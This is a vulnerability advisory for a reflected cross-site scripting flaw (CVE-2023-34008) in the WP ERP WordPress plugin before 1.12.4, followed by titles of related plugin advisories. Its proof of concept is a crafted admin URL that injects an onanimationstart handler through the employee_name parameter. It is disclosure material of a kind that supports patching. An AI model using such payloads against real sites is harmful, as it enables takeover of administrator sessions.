WP ERP < 1.12.4 – Reflected Cross-Site Scripting | CVE 2023-34008 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape the employee_name parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.

Proof of Concept

As an admin user, visit the following URL on the site:

/wp-admin/admin.php?page=erp-hr&section=leave&employee_name=employee123"+style%3Danimation-name%3Arotation+onanimationstart%3Dalert(%2FXSS%2F)%2F%2F

Click on the "Filter Leave Requests" button to trigger the XSS.

Affects Plugins

Fixed in 1.12.4

References

CVE

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Alex Sanford

Submitter

Alex Sanford

Submitter website

https://wpscan.com

Verified

Yes

WPVDB ID

517c6aa4-a56d-4f13-b370-7c864dd9c7db

Timeline

Publicly Published

2023-06-05 (about 11 months ago)

Added

2023-06-05 (about 11 months ago)

Last Updated

2023-08-30 (about 8 months ago)

Other

Published

Title

Published

2023-05-23

Title

Go Pricing - WordPress Responsive Pricing Tables < 3.4 - Contributor+ Stored XSS

Published

2021-10-29

Title

Download Monitor < 4.4.7 - Admin+ Stored Cross-Site Scripting

Published

2021-08-16

Title

CBX Bookmark & Favorite < 1.6.9 - Reflected Cross-Site Scripting

Published

2022-09-26

Title

Comment Guestbook <= 0.8.0 - Admin+ Stored Cross-Site Scripting

Published

2023-07-17

Title

PDQ CSV < 2.0.0 - Admin+ Stored Cross-Site Scripting